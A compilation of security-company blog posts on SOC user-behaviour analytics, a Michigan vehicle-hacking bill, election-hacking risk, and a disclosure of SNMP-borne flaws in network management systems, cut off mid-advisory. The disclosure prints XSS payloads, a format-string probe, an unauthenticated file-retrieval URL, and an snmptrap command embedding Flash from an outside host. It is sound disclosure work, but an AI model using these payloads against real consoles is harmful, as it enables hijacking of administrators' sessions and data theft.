
[Editor’s Note: This is a sneak peek at what Tim will be presenting at UNITED 2016 in November. Learn more and secure your pass at http://www.unitedsummit.org!]

 

In today's big data and data science age, you need to think outside the box when it comes to malware and advanced threat protection. On the Analytic Response team at our 24/7 SOC in Alexandria, VA, we use three levels of user behavior analytics to identify and respond to threats. The model is defined as User-Host-Process, or UHP. Using this model and its supporting datasets allows our team to quickly neutralize and protect against advanced threats with high confidence.

What is the User-Host-Process Model?

 

The UHP model supports our incident response and SOC analysts by adding context to every finding and pinpointing anomalous behavior. At its essence, it asks three main questions:

 

  • What users are on the network?
  • What hosts are they accessing?
  • What processes are users running on those hosts?

Advanced threat protection with a UHP model

 

This model also includes several enrichment sources such as operating system anomalies, whitelisting and known evil to help in the decision-making process. Once these datasets are populated, the output from the model can be applied in a variety of different ways.

 

For example, most modern SIEM solutions alert if a user logs in from a new, foreign country IP address. If you need to validate the alert armed only with log files, you'd be hard-pressed to confirm whether the activity is malicious or benign. Our Analytic Response team uses the UHP model to automatically bring in contextual data on users, hosts, and processes to help validate the alert. Here are some example artifacts:

 

  • User Account Information
    • Account created, Active Directory, accessed hosts, public IPs...
  • Host Information
    • Destination host purpose, location, owner, operating system, service pack, criticality, sensitivity...
  • Process Information
    • Process name, process id, parent process id, path, hashes, arguments, children, parents, execution order, network connections...

 

With this supporting data, we build a profile for each user or artifact found. Circling back to our example "user logged in from a new IP address in a foreign country", we can add this context:

 

  • Does the user typically log in and behave in this way?
    • Day/time of login, process execution order, duration of login
  • How often does the user run these particular processes?
    • Common, unique, rare
  • How common is this user's authentication onto this system?
  • How often have these processes executed on this system?

 

Armed with UHP model data, we have a baseline of user activity to aid in threat validation. If this user has never logged in from this remote IP, seldom logs into the destination system, and their process execution chain deviates from historical activity, we know that this alert needs further investigation.
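
To make this concrete, here is a minimal sketch of how a "login from a new IP" alert might be scored against a stored UHP baseline. This is purely illustrative -- the profile fields, weights, and thresholds are hypothetical, not our production logic.

# Hypothetical sketch: score a "login from new IP" alert against a stored UHP baseline.
# The profile structure and weights are illustrative, not Rapid7's actual implementation.

def score_login_alert(alert, profile):
    """Return a rough suspicion score and the reasons behind it."""
    reasons = []
    score = 0

    if alert["source_ip"] not in profile["known_ips"]:
        score += 3
        reasons.append("source IP never seen for this user")

    if alert["dest_host"] not in profile["common_hosts"]:
        score += 2
        reasons.append("user rarely authenticates to this host")

    lo, hi = profile["typical_login_hours"]          # e.g. (8, 18)
    if not (lo <= alert["login_hour"] <= hi):
        score += 1
        reasons.append("login outside the user's normal hours")

    # Compare the observed process chain against what this user normally runs.
    new_procs = set(alert["process_chain"]) - set(profile["common_processes"])
    if new_procs:
        score += 2
        reasons.append("unfamiliar processes: %s" % ", ".join(sorted(new_procs)))

    return score, reasons


profile = {
    "known_ips": {"203.0.113.10"},
    "common_hosts": {"FILESRV01"},
    "typical_login_hours": (8, 18),
    "common_processes": {"outlook.exe", "chrome.exe"},
}
alert = {
    "source_ip": "198.51.100.77",
    "dest_host": "SQLSRV02",
    "login_hour": 3,
    "process_chain": ["cmd.exe", "powershell.exe"],
}
print(score_login_alert(alert, profile))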

 

Analyzing Malware, the UHP Way

 

Adhering to a UHP model means that for every executable, important metadata and artifacts are collected not only during execution, but also as a static binary. When you’re able to compare binary commonality, arguments, execution frequency and other lower level attributes, you now have additional context to make nuanced decisions about suspected malware.

 

For example, consider the question, "How unique is a process?" There are several layers to it. Let's look at four:

 

  • Process commonality on a single asset
    • Single host baseline
  • Process commonality at an organizational level
    • Across all of my assets, how many are running this process?
  • Process commonality at an industry/sector level
    • Across organizations in the same vertical, how common is this process?
  • Process commonality for all available datasets.

 

To be most effective, the User, Host, and Process model applies multiple datasets to a specific question to aid in validation. If the "U" (user) dataset surfaces no anomalies, the Host layer is applied next, and finally the Process layer is applied to find anomalies.
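
As a rough illustration of the commonality question, the sketch below counts what fraction of hosts in a made-up execution dataset have run each process. The event layout and the rarity thresholds are assumptions for demonstration only.

# Hypothetical sketch: measure process commonality at the host and organization level.
# `events` stands in for whatever process-execution telemetry you collect.
from collections import defaultdict

events = [
    {"host": "WS01", "process": "chrome.exe"},
    {"host": "WS02", "process": "chrome.exe"},
    {"host": "WS03", "process": "chrome.exe"},
    {"host": "WS01", "process": "weird_tool.exe"},
]

def commonality(events):
    hosts_per_process = defaultdict(set)
    all_hosts = set()
    for e in events:
        hosts_per_process[e["process"]].add(e["host"])
        all_hosts.add(e["host"])
    # Fraction of the fleet that has ever run each process.
    return {p: len(h) / len(all_hosts) for p, h in hosts_per_process.items()}

for process, ratio in sorted(commonality(events).items(), key=lambda kv: kv[1]):
    label = "rare" if ratio < 0.1 else "uncommon" if ratio < 0.5 else "common"
    print(f"{process}: seen on {ratio:.0%} of hosts ({label})")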

 

Use Case: Webshell

 

Rapid7 was called to assist on an Incident Response engagement involving potential unauthorized access and suspicious activity on a customer’s public facing web server. The customer had deployed a system running Windows Internet Information Services (IIS) to serve static/dynamic content web pages for their clients.

 

We started the engagement by pulling data around the users in the environment, the hosts, and real-time process executions to build up the UHP model. While the User and Host models didn't detect any initial anomalies in this case, the real-time process tracking, cross-process attributes, baselines, and context models identified suspicious command-line execution from the parent process w3wp.exe, the IIS process responsible for running the webserver. Using this data, we pivoted to the web logs, which identified the suspicious webshell being accessed from a remote IP address. From there we were able to thoroughly remediate the attack.
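
A simplified version of that detection logic might look like the following sketch; the event fields and the list of "suspicious" child processes are assumptions for illustration, not the actual Analytic Response rules.

# Hypothetical sketch: flag command-line children of the IIS worker process (w3wp.exe),
# a common tell for webshell activity. Field names are illustrative.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "whoami.exe", "net.exe"}

def flag_webshell_candidates(process_events):
    hits = []
    for event in process_events:
        parent = event.get("parent_name", "").lower()
        child = event.get("process_name", "").lower()
        if parent == "w3wp.exe" and child in SUSPICIOUS_CHILDREN:
            hits.append(event)
    return hits

sample = [
    {"parent_name": "w3wp.exe", "process_name": "cmd.exe",
     "command_line": "cmd.exe /c whoami", "host": "WEB01"},
    {"parent_name": "explorer.exe", "process_name": "chrome.exe",
     "command_line": "chrome.exe", "host": "WS02"},
]
for hit in flag_webshell_candidates(sample):
    print("Investigate:", hit["host"], hit["command_line"])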

 

Summary

 

The Analytic Response team uses models such as UHP to help automate alert validation and add context to findings. Adding datasets from external sources such as VirusTotal, NSRL, and IP-related tools infuses additional context into the alerts, increasing analyst confidence and slashing incident investigation times. For each of our Analytic Response customers, we take into account their unique user, host, and process profiles. By applying the UHP model during alert triage, hunting, and incident response, we can quickly and accurately identify and protect against advanced threats and malware in your enterprise.

 

If you’d like to learn more about Analytic Response, check out our Service Brief [PDF]. If you need Incident Response services, we’re always available: 1-844-RAPID-IR.

Yesterday, the Michigan Senate Judiciary Committee passed a bill – S.B. 0927 – that forbids some forms of vehicle hacking, but includes specific protections for cybersecurity researchers. Rapid7 supports these protections. The bill is not law yet – it has only cleared a Committee in the Senate, but it looks poised to keep advancing in the state legislature. Our background and analysis of the bill is below.

 

In summary:

  • The amended bill offers legal protections for independent research and repair of vehicle computers. These protections do not exist in current Michigan state law.
  • The amended bill bans some forms of vehicle hacking that damage property or people, but we believe this was already largely prohibited under current Michigan state law.
  • The bill attempts to make penalties for hacking more proportional, but this may not be effective.

 

Background

 

Earlier this year, Michigan state Senator Mike Kowall introduced S.B. 0927 to prohibit accessing a motor vehicle's electronic system without authorization. The bill would have punished violations with a potential life sentence. As noted by press reports at the time, the bill's broad language made no distinction between malicious actors, researchers, or harmless access. The original bill is available here.

 

After S.B. 0927 was introduced, Rapid7 worked with a coalition of cybersecurity researchers and companies to detail concerns that the bill would chill legitimate research. We argued that motorists are safer as a result of independent research efforts that are not necessarily authorized by vehicle manufacturers. For example, in Jul. 2015, researchers found serious security flaws in Jeep software, prompting a recall of 1.4 million vehicles. Blocking independent research to uncover vehicle software flaws would undermine cybersecurity and put motorists at greater risk.

 

Over a four-month period, Rapid7 worked rather extensively with Sen. Kowall's office and Michigan state executive agencies to minimize the bill's damage to cybersecurity research. We applaud their willingness to consider our concerns and suggestions. The amended bill passed by the Michigan Senate Judiciary Committee, we believe, will help provide researchers with greater legal certainty to independently evaluate and improve vehicle cybersecurity in Michigan.

 

The Researcher Protections

 

First, let's examine the bill's protections for researchers – Sec. 5(2)(B); pg. 6, lines 16-21. Explicit protection for cybersecurity researchers does not currently exist in Michigan state law, so we view this provision as a significant step forward.

 

This provision says researchers do not violate the bill's ban on vehicle hacking if the purpose is to test, refine, or improve the vehicle – and not to damage critical infrastructure, other property, or injure other people. The research must also be performed under safe and controlled conditions. A court would need to interpret what qualifies as "safe and controlled" conditions – hacking a moving vehicle on a highway probably would not qualify, but we would argue that working in one's own garage likely sufficiently limits the risks to other people and property.

 

The researcher protections do not depend on authorization from the vehicle manufacturer, dealer, or owner. However, because of the inherent safety risks of vehicles, Rapid7 would support a well-crafted requirement that research beyond passive signals monitoring must obtain authorization from the vehicle owner (as distinct from the manufacturer).

 

The bill offers similar protections for licensed manufacturers, dealers, and mechanics [Sec. 5(2)(A); pg. 6, lines 10-15]. However, neither current state law nor the bill would explicitly give vehicle owners (who are not mechanics, or are not conducting research) the right to access their own vehicle computers without manufacturer authorization. Since Michigan state law does not clearly give owners this ability, the bill is not a step back here. Nonetheless, we would prefer the legislation make clear that it is not a crime for owners to independently access their own vehicle and device software.

 

The Vehicle Hacking Ban

 

The amended bill would explicitly prohibit unauthorized access to motor vehicle electronic systems to alter or use vehicle computers, but only if the purpose was to damage the vehicle, injure persons, or damage other property [Sec. 5(1)(c)-(d); pgs. 5-6, lines 23-8]. That is an important limit that should exclude, for example, passive observation of public vehicle signals or attempts to fix (as opposed to damage) a vehicle.

 

Although the amended bill would introduce a new ban on certain types of vehicle hacking, our take is that this was already illegal under existing Michigan state law. Current Michigan law – at MCL 752.795 – prohibits unauthorized access to "a computer program, computer, computer system, or computer network." The current state definition of "computer" – at MCL 752.792 – is already sweeping enough to encompass vehicle computers and communications systems. Since the law already prohibits unauthorized hacking of vehicle computers, it's difficult to see why this legislation is actually necessary. Although the bill’s definition of "motor vehicle electronic system" is too broad [Sec. 2(11); pgs. 3-4, lines 25-3], its redundancy with current state law makes this legislation less of an expansion than if there were no overlap.

 

Penalty Changes

 

The amended bill attempts to create some balance to sentencing under Michigan state computer crime law [Sec. 7(2)(A); pg. 8, line 11]. This provision essentially makes harmless violations of Sec. 5 (which includes the general ban on hacking, including vehicles) a misdemeanor, as opposed to a felony. Current state law – at MCL 752.797(2) – makes all Sec. 5 violations felonies, which is potentially harsh for innocuous offenses. We believe that penalties for unauthorized hacking should be proportionate to the crime, so building additional balance in the law is welcome.

 

However, this provision is limited and contradictory. The Sec. 7 provision applies only to those who "did not, and did not intend to," acquire/alter/use a computer or data, and if the violation can be "cured without injury or damage." But to violate Sec. 5, the person must have intentionally accessed a computer to acquire/alter/use a computer or data. So the person did not violate Sec. 5 in the first place if the person did not do those things or did not do them intentionally. It’s unclear under what scenario Sec. 7 would kick in and provide a more proportionate sentence – but at least this provision does not appear to cause any harm. We hope this provision can be strengthened and clarified as the bill moves through the Michigan state legislature.

 

Conclusion

 

On balance, we think the amended bill is a major improvement on the original, though not perfect. The most important improvements we'd like to see are:

  1. Clarifying the penalty limitation in Sec. 7; 
  2. Narrowing the definition of "motor vehicle electronic system" in Sec. 2; and
  3. Limiting criminal liability for owners that access software on vehicle computers they own.

 

However, the clear protections for independent researchers are quite helpful, and Rapid7 supports them. To us, the researcher protections further demonstrate that lawmakers are recognizing the benefits of independent research to advance safety, security, and innovation. The attempt at creating proportional sentences is also sorely needed and welcome, if inelegantly executed.

 

The amended bill is at a relatively early stage in the legislative process. It must still pass through the Michigan Senate and House. Nonetheless, it starts off on much more positive footing than it did originally. We intend to track the bill as it moves through the Michigan legislature and hope to see it improve further. In the meantime, we'd welcome feedback from the community.

Today, we're less than fifty days from the next U.S. presidential election, and over the next couple months, I fully expect to see a lot of speculation over the likelihood of someone "hacking the election." But what does that even mean?

 

The U.S. election system is a massively complex tangle of technology, and, at first, second, and third glance, it appears to embody the absolute worst practices when it comes to information security. There are cleartext, Internet-based entry points to the voting system. There is an aging installed base of voting machines running proprietary, closed-source code, produced by many vendors. And there is a bizarrely distributed model of authority over the election, where no one actually has the power to enforce a common set of security standards.

 

Sure, it seems bad. Nightmarish, really. But what are the actual risks here? If an adversary wanted to "hack" the "election," what could that adversary actually accomplish?

 

Online Voting in the U.S.

According to this PDF report from EPIC, the Verified Voting Foundation, and Common Cause, 32 states have some form of Internet-enabled voting. However, those systems are not the kind of easy, point-and-click interfaces most people think of when you say "Internet-enabled." They tend to be systems for distributing ballots that the voter needs to print out on paper (ugh), sign (often with a witness's countersignature), and then email or fax back to the state authority for counting.

 

Systems like these raise privacy concerns. On a purely technical level, email and fax do not offer any sort of encryption. Ballots cast this way are passed around the public internet "in the clear," and if an attacker is able to compromise any point along the path of transmission, that attacker can intercept these completed ballots. So, not only does this system do away with any notion of a secret ballot, it does so in a way that ignores any modern understanding of cryptographic security.

 

Clearly, this is a bummer for security professionals. We'd much rather see online voting systems with encryption built in. Web sites use HTTPS, an encrypted protocol, to avoid leaking important things like credit card numbers and passwords over public networks, so we'd like to see at least this level of security for something as critical as a voter's ballot.

 

That said, actually attacking this system doesn't scale very well for an adversary. First, they would need to target remote, online voters for snooping and interception. These voters are a minority, since most voting in every state happens either in person, or with paper ballots sent in the regular postal mail. Once the vulnerable population is identified, the adversary would then need to either wait for the voters to cast their ballots in order to change those ballots in transit, or vote on behalf of the legitimate voter before she gets a chance to. Active cleartext attacks like this work pretty well against one person or one location, but they are difficult to pull off at the kind of scale needed to tip an election.

 

Alternatively, the adversary could invent a population of phantom voters, register them to vote remotely, and stuff the ballot box with fake votes. Again, this isn't impossible, but it's also fairly high effort, since voter registration is already somewhat difficult for legitimate voters; automating it at scale just isn't possible in most counties in the U.S.

 

This leaves the servers that are responsible for collecting online ballots. The easiest thing to do here would be to kick them offline with a standard Denial-of-Service (DoS) attack, so all those emailed ballots would be dropped. This sort of attack would be pretty noticeable to the system maintainers, though, and I would expect people would switch back to paper mail pretty quickly. Remember, these systems aren't intended to be used on election day -- they merely collect absentee ballots, so there is going to be plenty of time to switch to the paper-based backup.

 

A total compromise of the ballot collection servers could enable attackers to alter or destroy votes in a much sneakier way, and an attack like this could potentially avoid detection until after the election is called. On the bright side, this kind of attack appears possible for only five of the Internet-enabled voting states. Only Alabama, Alaska, Arizona, North Dakota, and Missouri have an "Internet portal." None of these states appear to be battleground states according to FiveThirtyEight's latest projections. So, regardless of their security posture (which isn't known), attacking these portals isn't likely to net a lot of gain for attackers wishing to influence the Presidential election one way or the other. If Florida or Pennsylvania had one of these portals, I'd be a lot more worried.

 

Hacking Voting Machines

Another common theme of "election hacking" stories involves attacking the voting machine directly, in order to alter the votes cast on site. Now, on the one hand, no electronic voting machine is cyber-bulletproof. I have every expectation that these voting computers have some bugs, and some of those bugs weaken the security of the system. I'd love to see open source, auditable voting machine code. Voting is important, and the machines we trust to tabulate results should be trustworthy.

 

On the other hand, if the adversary needs to physically visit voting machines in order to fiddle with results, then he'd need a whole lot of bodies in a whole lot of polling places in order to make a real dent in the results of an election. Don't get me wrong, wireless networking is getting ubiquitous, and high-gain antennae are a thing. But even with ideal placement and transmission power, the attacker is going to need to be within sight of a polling place in order to conduct practical attacks on a WiFi-enabled voting machine.

 

So, while such an attack is remote, it's not sitting-in-another-country remote. More like parked-outside-the-polling-place remote. WiFi voting machines are a terrible idea, but they don't appear to be an existential threat to democracy.

 

Ancillary Attacks: Voter Information

So, rather than attacking ballot-issuing and ballot-counting systems directly, attackers have much more attractive targets available connected to the election. Voter records, for example, are tempting to cyber criminals, since they contain enough personally identifiable information (PII) to kick off identity theft and identity fraud attacks at scale. Unfortunately, those particular cats are already out of the bag. 191 million voter records were accidentally leaked late in 2015, and the FBI warned in August that some state voter databases have suffered breaches.

 

Altering voter registration records is a big deal, for sure, since such attacks can help an adversary actually affect voter turnout for targeted voting blocs. While that's not what's being reported today, such an attack could not only nudge election results one way or another, but possibly bring into question the integrity of the democratic process itself. After all, "voter fraud," despite being practically non-existent in any recent election in the U.S., is a hot-button political topic. If an attack were detected that involved altering voter records, it would almost certainly be seen as a smoking gun that implies systematic voter fraud, therefore undermining confidence in the election for a huge chunk of the electorate. For more on likely voter data attacks, and what voter registration officials can do to safeguard that information, take a look at ST-16001, Securing Voter Registration Data from US-CERT.

 

Perception Matters

Of course, "hacking elections" may not involve actually compromising the balloting or vote counting processes at all.

https://xkcd.com/932/

 

Imagine that someone decided to take down a couple voter information websites. Would this technically interfere with the election process? Maybe, if some people were trying to find out where their polling place is. The obvious effect, though, would be to create the impression that the election is under cyber-attack... and never mind the fact that voter registration and polling place information websites routinely crash under load on election day, despite the best efforts of the people running those sites.

 

So What Can We Do To Secure Elections?

Election infrastructure is complex, and there are certain to be bugs in any complex system. While elections, just like nearly everything else, are made safer, more convenient, and more efficient with technology, that same technology is going to introduce new risks that we've never had to deal with before and haven't anticipated. Naturally, there's cause for concern there, even if it doesn't rise to the level of Total Democolypse.

 

If you're in charge of voting technology in your area, we strongly urge you to test your systems now, ahead of the election. You should be attacking the system to see what's possible, and what mitigations are needed to ensure the election will not be affected by any kinks in the system. If you're not sure where to start, feel free to contact community@rapid7.com - we're happy to connect you with a security expert (either from our own team or from the broader security community) who will have a chat with you for free. We all have a vested interest in ensuring voting technology is not compromised, so we want to do what we can to help.

 

If you're a U.S. voter concerned about the integrity of the election process in your district, feel free to get in touch with your local office of elections and ask them what they've done to ensure that the election experience is resilient against cyber threats. If you're a real go-getter, I encourage you to volunteer with your county as a poll worker, and see what's going on behind the scenes, up close. Every county always needs help around election day, and I can attest that my own experience as an election judge was a fun and rewarding way to protect democracy without being particularly partisan.



NOTE: A version of this essay first appeared in CSM Passcode. You can read that version here: Opinion: Think hackers will tip the vote? Read this first - CSMonitor.com .

As you may recall, back in December Rapid7 disclosed six vulnerabilities that affect four different Network Management System (NMS) products, discovered by Deral Heiland of Rapid7 and independent researcher Matthew Kienow. In March, Deral followed up with another pair of vulnerabilities for another NMS. Today, we're releasing a new disclosure that covers 11 issues across four vendors. As is our custom, these were all reported to vendors and CERT for coordinated disclosure.

 

While this disclosure covers a wide range of vulnerabilities discovered (and fixed), the theme of injecting malicious data via SNMP to ultimately gain control of NMS web console browser windows became overwhelmingly obvious, and deserving of a more in-depth look. To that end, today, Rapid7 would like to offer a complete research report on the subject. From Managed to Mangled: SNMP Exploits for Network Management Systems by Deral, Matthew, and yours truly is available for download here, and we'd love to hear your feedback on this technique in the comments below. We'll all be at DerbyCon as well, and since Matthew and Deral will be presenting these findings on Saturday, September 24th, 2016, it will be a fine time to chat about this.

 

Incidentally, we're quite pleased that every one of these vendors has issued patches to address these issues well before our planned disclosure today. All acted reasonably and responsibly to ensure their customers and users are protected against this technique, and we're confident that going forward, NMSs will do a much better job of inspecting and sanitizing machine-supplied, as well as user-supplied, input.
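
The common thread in those fixes is treating SNMP-supplied strings as untrusted input. The sketch below shows the general idea -- HTML-escape every agent- or trap-supplied value before it reaches a web console -- and is illustrative only; the rendering function and field names are hypothetical, not any vendor's actual patch.

# Minimal sketch of the mitigation: HTML-escape machine-supplied SNMP values
# (sysDescr, sysContact, trap varbinds, ...) before rendering them in a web console.
import html

def render_device_row(snmp_fields):
    safe = {k: html.escape(str(v), quote=True) for k, v in snmp_fields.items()}
    return "<tr><td>{sysName}</td><td>{sysDescr}</td><td>{sysLocation}</td></tr>".format(**safe)

malicious = {
    "sysName": "printer01",
    "sysDescr": '<SCRIPT>alert("XSS-sysDescr")</SCRIPT>',
    "sysLocation": "<embed src=//ld1.us/4.swf>",
}
print(render_device_row(malicious))
# The payload is rendered as inert text (&lt;SCRIPT&gt;...) instead of executing.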

 

With that, let's get on with the disclosing!

 

Rapid7 Identifier   CVE Identifier   Class           Vendor      Patched
R7-2016-11.1        CVE-2016-5073    XSS             CloudView   Version 2.10a
R7-2016-11.2        CVE-2016-5073    XSS             CloudView   Version 2.10a
R7-2016-11.3        CVE-2016-5074    Format String   CloudView   Version 2.10a
R7-2016-11.4        CVE-2016-5075    XSS             CloudView   Version 2.10a
R7-2016-11.5        CVE-2016-5076    DOA             CloudView   Version 2.10a
R7-2016-12          CVE-2016-5077    XSS             Netikus     Version 3.2.1.44
R7-2016-13          CVE-2016-5078    XSS             Paessler    Version 16.2.24.4045
R7-2016-14.1        CVE-2016-5642    XSS             Opmantek    Versions 8.5.12G
R7-2016-14.2        CVE-2016-5642    XSS             Opmantek    Versions 8.5.12G, 4.3.7c
R7-2016-14.3        CVE-2016-5642    XSS             Opmantek    Versions 8.5.12G, 4.3.7c
R7-2016-14.4        CVE-2016-6534    Cmd Injection   Opmantek    Versions 8.5.12G, 4.3.7c

 

R7-2016-11: Multiple Issues in CloudView NMS

CloudView NMS versions 2.07b and 2.09b are vulnerable to a persistent Cross Site Scripting (XSS) vulnerability over SNMP agent responses and SNMP trap messages, a format string vulnerability in processing SNMP agent responses, a persistent XSS vulnerability via telnet login, and an insecure direct object reference issue. These issues were resolved in version 2.10a, available from the vendor. None of these issues require any prior authentication to exploit.

 

These issues were discovered by Deral Heiland of Rapid7, Inc.

 

R7-2016-11.1: XSS via SNMP Agent Responses (CVE-2016-5073)

While examining the Network Management System (NMS) software CloudView NMS, it was discovered to be vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within CloudView's web management interface. When this data (JavaScript) is viewed within the web console, the code will execute within the context of the authenticated user. This will allow a malicious actor to conduct attacks which can be used to modify the system's configuration, compromise data, take control of the product, or launch attacks against the authenticated user's host system.

 

The first persistent XSS vulnerability is delivered via the network SNMP discovery process. If a discovered network device is configured with SNMP, the SNMP OID object sysDescr (1.3.6.1.2.1.1.1) contains HTML or JavaScript code, and the discovered device is imported into the database, then that code will be delivered to the product for persistent display and execution.

 

The following example shows the results of discovering a network device where the SNMP sysDescr has been set to <SCRIPT>alert("XSS-sysDescr")</SCRIPT>. In this example, when the device is viewed on the web console's "Device List" screen, the JavaScript executes, rendering an alert box in the authenticated user's web browser.

cv-figure1.png

 

 

R7-2016-11.2: XSS via SNMP Trap Messages (CVE-2016-5073)

The second method of injection involves SNMP trap messages. The CloudView product allows unsolicited traps, which are stored within the logs. A malicious actor can inject HTML and JavaScript code into the product via SNMP trap message. When the SNMP trap message information is viewed the code will execute within the context of the authenticated user. Figure 2 shows an example attack where a trap message was used with the HTML code <embed src=//ld1.us/4.swf> to embed flash into the CloudView web console.

cv-figure2.png

 

R7-2016-11.3: Format String Vulnerability via SNMP (CVE-2016-5074)

CloudView NMS was also discovered to be vulnerable to a format string vulnerability. This vulnerability allows a malicious actor to inject format string specifiers into the product via the SNMP sysDescr field. If successfully exploited, this could allow a malicious actor to execute code or trigger a denial of service condition within the application. The following OllyDbg screenshot (Figure 3) shows a series of %x specifiers that were used within the SNMP sysDescr field of a discovered device to enumerate data from the main process stack and trigger an access violation with %s.

cv-figure5.png

 

R7-2016-11.4: XSS via Telnet Login (CVE-2016-5075)

A third method was discovered for injecting persistent XSS in the username field of the Remote CLI telnet service on TCP port 3082. A malicious actor with network access to this port could inject JavaScript or HTML code into the event logs using failed login attempts as shown below:

cv-figure3.png

cv-figure4.png

 

R7-2016-11.5: Direct Object Access (CVE-2016-5076)

During testing it was also discovered that files within the Windows file system were accessible without proper authentication. This allowed for full file system access on the Windows 2008 server systems running the product. In the following example, the URL http://192.168.2.72/MPR=:/server_rootC:/CloudView/data/admin/auto.def was used to retrieve the configuration file "auto.def" from the server without authentication.

cv-figure6.png

 

Disclosure Timeline

Mon, May 23, 2016: Initial contact to vendor

Mon, May 23, 2016: Vendor responded with security contact

Mon, May 23, 2016: Details provided to vendor security contact

Sun, Jun 05, 2016: Version 2.10a published by the vendor

Thu, Jun 09, 2016: Disclosed to CERT, tracked as VR-205

Tue, Jun 14, 2016: CVE-2016-5073, CVE-2016-5074, CVE-2016-5075, CVE-2016-5076 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

R7-2016-12: XSS via SNMP Trap Messages in Netikus EventSentry (CVE-2016-5077)

Netikus EventSentry NMS versions 3.2.1.8, 3.2.1.22, and 3.2.1.30 are vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This issue was fixed in version 3.2.1.44, available from the vendor. This issue does not require any prior authentication to exploit.

 

This issue was discovered by Deral Heiland of Rapid7, Inc.

 

Exploitation

While examining the Network Management System (NMS) software EventSentry, it was discovered to be vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within EventSentry's web management interface. When this data (JavaScript) is viewed within the web console, the code will execute within the context of the authenticated user. This will allow a malicious actor to conduct attacks which can be used to modify the system's configuration, compromise data, take control of the product or launch attacks against the authenticated user's host system.

 

This injection was conducted using unsolicited SNMP trap messages, which are stored within the SNMP logs on EventSentry. A malicious actor can inject HTML and JavaScript code into the product via SNMP trap message. When the SNMP trap message information is viewed, the code will execute within the context of the authenticated user. By using the following snmptrap command, it was possible to inject the HTML code <embed src=//ld1.us/4.swf> to embed Flash into the EventSentry web console SNMP logs:

 

snmptrap -v 1 -c public 192.168.2.72 '1' '192.168.2.68' 6 99 '55' 1 s "<embed src=//ld1.us/4.swf>"

 

netikus-figure1.png

 

Disclosure Timeline

Mon, May 23, 2016: Initial contact to vendor

Mon, May 23, 2016: Vendor responded with security contact

Mon, May 23, 2016: Details provided to vendor security contact

Fri, May 27, 2016: Version 3.2.1.44 published by the vendor

Thu, Jun 09, 2016: Disclosed to CERT, tracked as VR-205

Tue, Jun 14, 2016: CVE-2016-5077 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

R7-2016-13: XSS via SNMP in Paessler PRTG (CVE-2016-5078)

Paessler PRTG NMS version 16.2.24.3791 is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This issue does not require any prior authentication to exploit, and was fixed in version 16.2.24.4045, available from the vendor.

 

This issue was discovered by Deral Heiland of Rapid7, Inc.

 

Exploitation

While examining the Network Management System (NMS) software PRTG, it was discovered to be vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within PRTG’s Network Monitor web management interface. When this data (JavaScript) is viewed within the web console the code will execute within the context of the authenticated user. This will allow a malicious actor to conduct attacks which can be used to modify the system configuration, compromise data, take control of the product or launch attacks against the authenticated user's host system.

 

The persistent XSS vulnerability is delivered via the network SNMP discovery process of a device. If a discovered network device returns JavaScript or HTML code in any of the following SNMP OID objects, the code will be rendered within the context of the authenticated user who views the discovered device's "System Information" web page.

 

sysDescr    1.3.6.1.2.1.1.1.0
sysLocation 1.3.6.1.2.1.1.6.0
sysContact  1.3.6.1.2.1.1.4.0

 

The following example shows the results of discovering a network device where the SNMP sysDescr has been set to <embed src=//ld1.us/4.swf>. In this example, when a device's "System Information" web page is viewed in the web console, the HTML code will download and render the Flash file in the authenticated user's web browser.

pa-figure1.png
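
If you want to check whether devices on your own network return markup in these objects, a quick script along these lines can help. It assumes the Net-SNMP command-line tools (snmpget) are installed and that you are authorized to query the target; the host and community string below are placeholders.

# Hypothetical sketch: query the system-group OIDs listed above and flag values that
# contain HTML/JavaScript markup. Assumes the Net-SNMP `snmpget` utility is installed.
import re
import subprocess

OIDS = {
    "sysDescr": "1.3.6.1.2.1.1.1.0",
    "sysContact": "1.3.6.1.2.1.1.4.0",
    "sysLocation": "1.3.6.1.2.1.1.6.0",
}
MARKUP = re.compile(r"<\s*(script|embed|iframe|img|svg)", re.IGNORECASE)

def check_device(host, community="public"):
    findings = {}
    for name, oid in OIDS.items():
        out = subprocess.run(
            ["snmpget", "-v2c", "-c", community, "-Ovq", host, oid],
            capture_output=True, text=True, timeout=5,
        )
        value = out.stdout.strip()
        if MARKUP.search(value):
            findings[name] = value
    return findings

print(check_device("192.168.2.68"))   # placeholder target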

 

Disclosure Timeline

Mon, May 23, 2016: Initial contact to vendor

Tue, May 24, 2016: Vendor responded with security contact

Tue, May 24, 2016: Details provided to vendor security contact

Mon, Jun 06, 2016: Version 16.2.24.4045/4046 released by the vendor

Thu, Jun 09, 2016: Disclosed to CERT, tracked as VR-205

Tue, Jun 14, 2016: CVE-2016-5078 assigned by CERT

Wed, Sep 07, 2016: Public disclosure

 

R7-2016-14: Multiple Issues in Opmantek NMIS

Opmantek NMIS NMS versions 8.5.10G and 4.3.6f are vulnerable to a persistent Cross Site Scripting (XSS) vulnerability over SNMP agent responses and SNMP trap messages, a reflected XSS vulnerability over SNMP agent responses, and a command injection vulnerability. These issues were fixed in versions 8.5.12G and 4.3.7c, available from the vendor.

 

All three of the XSS attack methods allow an unauthenticated adversary to inject malicious content into the user’s browser session. This could cause arbitrary code execution in an authenticated user's browser session and may be leveraged to conduct further attacks. The code has access to the authenticated user's cookies and would be capable of performing privileged operations in the web application as the authenticated user, allowing for a variety of attacks.

 

These issues were discovered by independent researcher Matthew Kienow. Note that all three XSS vectors have been assigned the same CVE identifier.

 

R7-2016-14.1, XSS Injection via SNMP Trap Messages (CVE-2016-5642)

First, a stored (AKA Persistent or Type I) server XSS vulnerability exists due to insufficient filtering of SNMP trap-supplied data before the affected software stores and displays the data. Traps that will be processed by NMIS version 8.x depend on the configuration of snmptrapd, the Net-SNMP trap notification receiver. This component may be configured to accept all incoming notifications or may be constrained by defined access control. In the latter case, the adversary must determine the SNMP authorization credentials before launching the attack. Note that NMIS version 4.x does not have the capability of inspecting trap messages, so it is unaffected by this issue.

 

